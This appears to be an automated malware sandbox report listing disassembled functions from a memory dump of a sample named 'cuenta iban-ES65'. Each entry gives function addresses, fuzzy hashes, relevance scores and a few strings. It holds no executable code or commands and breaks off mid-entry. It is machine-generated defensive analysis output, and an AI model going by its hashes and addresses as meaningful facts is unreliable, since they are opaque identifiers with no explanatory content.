Instruction ID: 67edcad13948987377ea6eb3d5493f3b885fed50703b52c80178f8b583b273e0
Opcode Fuzzy Hash: 6965cac1e13bd5fab6b18dc40a87e1d3c4b851185aea300bbcdbc7d08ff272ce
Instruction Fuzzy Hash: 8F41BD75A00619DBEB15CF88C888BBEBBB5EF40799F00455EEC44AF244DB34A941CBD1

Uniqueness

Uniqueness Score: -1.00%

Function 3776360F Relevance: 1.4, Strings: 1, Instructions: 106COMMON

Download Yara Rule

Strings

Flst, xrefs: 37763651

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: Flst
API String ID: 0-2374792617
Opcode ID: 309c359cbc97c3abc8228092b1bebba04d47eea0ad3bbee9fe3bb4b0e926fe7b
Instruction ID: 3dac799634e290e6a440a1508fdc5b606d28dcb2e8f161cbe5e474764448eb54
Opcode Fuzzy Hash: 309c359cbc97c3abc8228092b1bebba04d47eea0ad3bbee9fe3bb4b0e926fe7b
Instruction Fuzzy Hash: 5E41CDB0605301DFE304CF18C588A26FBE5EF89728F11866EE8589F385DB71D846CB92

Uniqueness

Uniqueness Score: -1.00%

Function 377296E0 Relevance: 1.3, Strings: 1, Instructions: 96COMMON

Download Yara Rule

Strings

3Pw3Pw, xrefs: 37729757

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID: DebugPrintTimes
String ID: 3Pw3Pw
API String ID: 3446177414-1435530137
Opcode ID: 50bce56f5ead730143acaf8390ab8ce168f3a6a41df2b7c3fdf929de312ebcd2
Instruction ID: cbefd8fcf5536390e5626971080c02e8ddfd90f89be61f553a814d0fa0ff1cf2
Opcode Fuzzy Hash: 50bce56f5ead730143acaf8390ab8ce168f3a6a41df2b7c3fdf929de312ebcd2
Instruction Fuzzy Hash: 5621F576600710AFD3219F68C454B1A7BB5FF88B60F154829E565AF340DB34EE00EF91

Uniqueness

Uniqueness Score: -1.00%

Function 377AC6F2 Relevance: 1.3, Strings: 1, Instructions: 94COMMON

Download Yara Rule

Strings

BinaryName, xrefs: 377AC722

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID: BinaryName
API String ID: 0-215506332
Opcode ID: 4df87c36de482768d17678c1784e30f29964e1a6f5bc63d26cb455b905599ebc
Instruction ID: fbae744b017ca5837c498a7c0db95ec749697653cb5b9646f0f33019a83d4e1c
Opcode Fuzzy Hash: 4df87c36de482768d17678c1784e30f29964e1a6f5bc63d26cb455b905599ebc
Instruction Fuzzy Hash: 2F31D17A900619BFFB16CA5CC845E6FB7B5EF81720F014629E810AF350DB309E04C7A1

Uniqueness

Uniqueness Score: -1.00%

Function 3777508C Relevance: .8, Instructions: 785COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c9a6c6156e46dc4f4ce16f17268fed7d389cad06ce1fa2d2b6af04677ea0b8ac
Instruction ID: 177c6e0f827c0ff449c5df980dc04855707e9606b1c9c1dde2920329aeead746
Opcode Fuzzy Hash: c9a6c6156e46dc4f4ce16f17268fed7d389cad06ce1fa2d2b6af04677ea0b8ac
Instruction Fuzzy Hash: 2962BD369047CA9FDF14CF48C4D15BEBB62BE55399B46CA6CC89A6B600D331BA54CBC0

Uniqueness

Uniqueness Score: -1.00%

Function 3778717A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3390c01a325b6de9d809aa349ac1b7e515637cd1260c2a8a17bc28a569387a18
Instruction ID: d1cf8a9092ec6c1e365526227107bdb6967f2df23989cadaf8fd17b3695c2b77
Opcode Fuzzy Hash: 3390c01a325b6de9d809aa349ac1b7e515637cd1260c2a8a17bc28a569387a18
Instruction Fuzzy Hash: B1428075A00626AFDB04CF99C4916AEB7B2FF89364F14856DD856AF340DB34E842CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 3775B1E0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ca9195a1c1560d5f7fee732391cc413ed2c3edf6299e81bd708a2d2ce73410b
Instruction ID: 874fec50bac806e8116036f249cd8a7ed1c7b8c32f5064a900d01aa8f7af8e86
Opcode Fuzzy Hash: 6ca9195a1c1560d5f7fee732391cc413ed2c3edf6299e81bd708a2d2ce73410b
Instruction Fuzzy Hash: FE328FB5E012599BDF14CFA8C888BBEBBB2FF54764F140069E805AF360D735A901CB91

Uniqueness

Uniqueness Score: -1.00%

Function 37742760 Relevance: .6, Instructions: 605COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b88c4734e032b4ac0dc09dc1caa17ac98c95b08a6089e0d2eec3956d49e7fab0
Instruction ID: db0c0f8f8666c0405252487ecf4c17083a4d5ec270dc918b87efe3271a69fe74
Opcode Fuzzy Hash: b88c4734e032b4ac0dc09dc1caa17ac98c95b08a6089e0d2eec3956d49e7fab0
Instruction Fuzzy Hash: 5932FD74A017548FEB24CFA9C8547AEBBF2BF86754F204A2DD445DF284DB39A802CB51

Uniqueness

Uniqueness Score: -1.00%

Function 377F124C Relevance: .6, Instructions: 571COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3d6fc544bb989a8123d9542e306f584bded3b18ca139e7ff97caca66dc929103
Instruction ID: 49295da62eced33d53e55ad5bcac932807cc8ad90edf828383250b7a76ae46a5
Opcode Fuzzy Hash: 3d6fc544bb989a8123d9542e306f584bded3b18ca139e7ff97caca66dc929103
Instruction Fuzzy Hash: C722A075B00216CFDB09CF98C690AAAB7F2BF88364F14856DD855EF344DB35A942CB90

Uniqueness

Uniqueness Score: -1.00%

Function 3775FAA0 Relevance: .6, Instructions: 559COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0e30091a17cdb62212809e42190d3995f29c74d49fcc4e617e3cee4d68c2b3ff
Instruction ID: 17a3f24f0699a35c3596ba32521408d3c6c6ab414fe42e16829bce3fc19f6474
Opcode Fuzzy Hash: 0e30091a17cdb62212809e42190d3995f29c74d49fcc4e617e3cee4d68c2b3ff
Instruction Fuzzy Hash: 5622A575A00209DFEB44CFA4C884BAEB7B5FF44364F508AA9D814AF341E734EA55CB91

Uniqueness

Uniqueness Score: -1.00%

Function 37758CDF Relevance: .6, Instructions: 554COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 288a305fe9c0f0deb407299f346684435055204ce6623daa4f87d2e2b5712576
Instruction ID: 9ca5b8601e41e73500d5328b2168c94ccf8b64aedca3bb15c96b9879a777ece2
Opcode Fuzzy Hash: 288a305fe9c0f0deb407299f346684435055204ce6623daa4f87d2e2b5712576
Instruction Fuzzy Hash: B6226E74E0021ADBDB04CF95D880AFEBBF2BF49364F54846AE845AF241E738D951DB60

Uniqueness

Uniqueness Score: -1.00%

Function 377F1FC6 Relevance: .5, Instructions: 485COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 57f91f216e385579dcfe59a36a92c67d8dfcc3e56799d342cbc0d3c972e19495
Instruction ID: 41b51772d1ffed9294bc786e8ebef8b8a84a60dd4ba3102d20673519c7727e03
Opcode Fuzzy Hash: 57f91f216e385579dcfe59a36a92c67d8dfcc3e56799d342cbc0d3c972e19495
Instruction Fuzzy Hash: 1502D0B96046518BE714CF29CA8037DBBF2AF85350F55899AD895CF382D736E842DB20

Uniqueness

Uniqueness Score: -1.00%

Function 3775FCE0 Relevance: .4, Instructions: 390COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e840319bdf4c08e744c7c08003beaa7cc8b3b60757852276b3825bf1a988621
Instruction ID: c0980df7029a1cffc480548f5b10f1c4b805196bd73f70875dd31050eb36887d
Opcode Fuzzy Hash: 3e840319bdf4c08e744c7c08003beaa7cc8b3b60757852276b3825bf1a988621
Instruction Fuzzy Hash: 32F17F74A00209DFEB44CFA4C894BAEB7B5FF48314F148AA9D815AF345E734DA46CB91

Uniqueness

Uniqueness Score: -1.00%

Function 37728347 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 770528c8ce76f8da8e48d6fe3428200897de72d071dc87703c30116ad4782612
Instruction ID: 3b50af399e7e558f7039ef9303fce61a94bf669a6254259c7ec81a46f5a55ad0
Opcode Fuzzy Hash: 770528c8ce76f8da8e48d6fe3428200897de72d071dc87703c30116ad4782612
Instruction Fuzzy Hash: 4AD1EE71A00306AFEB04CF64C885BBE73B2EF44354F484629E825DF691EB35E945EB91

Uniqueness

Uniqueness Score: -1.00%

Function 3775C600 Relevance: .4, Instructions: 367COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0a25b56a8f0373b2463806cea1a10832da59e199763ef25fd942a13fff9479e
Instruction ID: dfd1288a9d84fb82077e6ceb5b2adb0363e2d290d33a1c5ba4737926e0da9493
Opcode Fuzzy Hash: b0a25b56a8f0373b2463806cea1a10832da59e199763ef25fd942a13fff9479e
Instruction Fuzzy Hash: 92D19F75E0435A8BEB08CF98C5817FDBBF2EB45374F50482AD445AF684DB74A989CB40

Uniqueness

Uniqueness Score: -1.00%

Function 3773D700 Relevance: .3, Instructions: 342COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a566d157e1c80dde48003dcfd9c0b04f886aa361966119b279e2e84a59fc41b5
Instruction ID: 221fc5d2fd65116707f6ab22f4b7e0781a8ce905f95f1a996502ccd6f44892cc
Opcode Fuzzy Hash: a566d157e1c80dde48003dcfd9c0b04f886aa361966119b279e2e84a59fc41b5
Instruction Fuzzy Hash: C6C1B175A022159FEB14CF58C841BEEB7B3EF49324F548669E824AF281E774E941CBC1

Uniqueness

Uniqueness Score: -1.00%

Function 37771763 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9cd4eed74efb2f8d0107bd3b2fff04c82f34c3c4016aabc101f95b3a63632f6c
Instruction ID: a60c2dcac3c87d462cea1e50548766c935fa5e4d22bbae78af7f62ce7ac3ba82
Opcode Fuzzy Hash: 9cd4eed74efb2f8d0107bd3b2fff04c82f34c3c4016aabc101f95b3a63632f6c
Instruction Fuzzy Hash: 7FD104B59007049FEB41CF68C984B9A7BEABF49350F0445BAED099F216DB35E905CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 3774F380 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0495d072151d12a84bad8525cfde8ba2cfe2c7d3abe0bfe680590b82f9bb6f9
Instruction ID: 03760c875a62ad9f073bbd3ff8b7cb163c797d12a66626db94614fa448ebe3bb
Opcode Fuzzy Hash: b0495d072151d12a84bad8525cfde8ba2cfe2c7d3abe0bfe680590b82f9bb6f9
Instruction Fuzzy Hash: 95C115B5B01320CBEB04CF18C490B79B7B2FF48B54F5A4599E845AF396DB349A42CB60

Uniqueness

Uniqueness Score: -1.00%

Function 377337E4 Relevance: .3, Instructions: 303COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 080fa42a2724f8116c23dff4695ecfa1ecf5f5783da94182f8c70504db6bc9e7
Instruction ID: 4c3527134ec0c378382003e19b382166de67645b0c146b597d2f80e8e461dad8
Opcode Fuzzy Hash: 080fa42a2724f8116c23dff4695ecfa1ecf5f5783da94182f8c70504db6bc9e7
Instruction Fuzzy Hash: D4C146B1A01605DFEB25CFA8C840BADBBF5FF49750F14446AE41AAB351DB38A901CF90

Uniqueness

Uniqueness Score: -1.00%

Function 37740445 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction ID: f56b94a8d31a980b115f189ee1145e3dea68b274a737880c993facf9b74257ba
Opcode Fuzzy Hash: 63b20c421a5f0d7cf45695429102df60821ed91581afdeee7473aace158a234d
Instruction Fuzzy Hash: EEB10135700749AFEB15CBA8C890BAFBBF6EF86314F1409A8D5519F281DB34EA41CB51

Uniqueness

Uniqueness Score: -1.00%

Function 377382E0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48296e7b54e5d0b934e5b7e24885516e62de5dac1840c15766da7852ebe80484
Instruction ID: 6638d8c5210ade957d2d3e29e59f441f22af435efb668723a7e41685456e68e7
Opcode Fuzzy Hash: 48296e7b54e5d0b934e5b7e24885516e62de5dac1840c15766da7852ebe80484
Instruction Fuzzy Hash: 35C147742093808FE760CF14C494BAAB7E5FF88354F444D6DE9998B691D774E908CFA2

Uniqueness

Uniqueness Score: -1.00%

Function 3772C3C7 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3b49e3a68f1506b1c36a0a3e6a3951f5081ee70aa32a5ac77cc1803ee40095e7
Instruction ID: ffde1829b7d5f47129d628b8468b5dee3cf2d7dfa460d909a67ded6feda70a85
Opcode Fuzzy Hash: 3b49e3a68f1506b1c36a0a3e6a3951f5081ee70aa32a5ac77cc1803ee40095e7
Instruction Fuzzy Hash: 01B19F74B002658FEB64CF65C880BB9B3F2AF54750F1085EAD41AAB240EB75DE85DF21

Uniqueness

Uniqueness Score: -1.00%

Function 3774E310 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f79a669adaca2cf64dbc31338e4eaec4d413a16001a5f70bbfe51363ffb9237b
Instruction ID: fa66a0c58747bf4f549bdcf44d33c0003886107369af8dea129a01c2bdc8510b
Opcode Fuzzy Hash: f79a669adaca2cf64dbc31338e4eaec4d413a16001a5f70bbfe51363ffb9237b
Instruction Fuzzy Hash: 79912375A11714CBE7108F68D484BBEB7B2EF85B74F1544A9E8049F380DB78E941CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 377393A6 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c64defd9636630a4ff313c4a7a049ad3ba2d97250d70410fdb60079f4309e1d
Instruction ID: 97fe02690bf795cbcba0c8277fa0c2a1f72336cb6d77a559b3032409df35ba6c
Opcode Fuzzy Hash: 1c64defd9636630a4ff313c4a7a049ad3ba2d97250d70410fdb60079f4309e1d
Instruction Fuzzy Hash: 96B152B9A02305CFFB14CF14D4407AA77B1BB45369F50895AD825AF292DB35D882CFE1

Uniqueness

Uniqueness Score: -1.00%

Function 37764670 Relevance: .3, Instructions: 251COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 52d28866923912aea037caaf76b29b6ebc11f287a642a7a1a27c71e49542574e
Instruction ID: 697153b8619942cbad78f299652e8229df5bdf6c66c181bd08fcd3d88f4c5677
Opcode Fuzzy Hash: 52d28866923912aea037caaf76b29b6ebc11f287a642a7a1a27c71e49542574e
Instruction Fuzzy Hash: 81816A75A043568FFB118E68C8C436EBB52EF6635CF240B7ADC418F349C624DA86D791

Uniqueness

Uniqueness Score: -1.00%

Function 37737290 Relevance: .2, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27d320b0a4526be4d21f51f47e419f109dd6a074299f4ab878a020f9133a40e2
Instruction ID: 8f256e1946a90e9cc26b7605b80d4e1a4c8c99c269abb71ae66d1ef3c8b0360e
Opcode Fuzzy Hash: 27d320b0a4526be4d21f51f47e419f109dd6a074299f4ab878a020f9133a40e2
Instruction Fuzzy Hash: 36A15475609342CFE314CF28C480A5ABBE6BF88754F20496EE5949B351EB34E945CFD2

Uniqueness

Uniqueness Score: -1.00%

Function 3777DB19 Relevance: .2, Instructions: 244COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
Instruction ID: ab2a9252934481e279756c4c91b8359d27731de043e8ff9816becc8de419e3f7
Opcode Fuzzy Hash: 8549c86322cfe958a29a8ef1ef3c7120cca5d0c53e5cdecc8be8a9795373b755
Instruction Fuzzy Hash: 3C915E76610B428FEB15CF29C885672BBE1FF45364B608E19E4A6EF6A0C775F421CB40

Uniqueness

Uniqueness Score: -1.00%

Function 377FF330 Relevance: .2, Instructions: 242COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9b12f2a318f075bee03d1ec66e9a78fe945e50b8aed23d317f1c8a5f5dbebf4c
Instruction ID: 72c8c64814417b82d8db726b0a80b67715d1e7326a79bd464e34e4608e428c16
Opcode Fuzzy Hash: 9b12f2a318f075bee03d1ec66e9a78fe945e50b8aed23d317f1c8a5f5dbebf4c
Instruction Fuzzy Hash: A891D675A10206DBEB00CF68CA40B6AB7E2EF84360F148979D854DF381DF76E906CB50

Uniqueness

Uniqueness Score: -1.00%

Function 377FEFBF Relevance: .2, Instructions: 241COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.13296586709.0000000037700000.00000040.00001000.00020000.00000000.sdmp, Offset: 37700000, based on PE: true

Associated: 00000002.00000002.13296586709.0000000037829000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.13296586709.000000003782D000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_37700000_cuenta iban-ES65.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cf11f1b42acfe1dd5821b670e25a972b86371d4ca38971e9d413cf24739ece5d
Instruction ID: 11ab61d550dd49ff82207c18f8b48657d7c40ecaeb5276e97e0b113882cdc7bf
Opcode Fuzzy Hash: cf11f1b42acfe1dd5821b670e25a972b86371d4ca38971e9d413cf24739ece5d
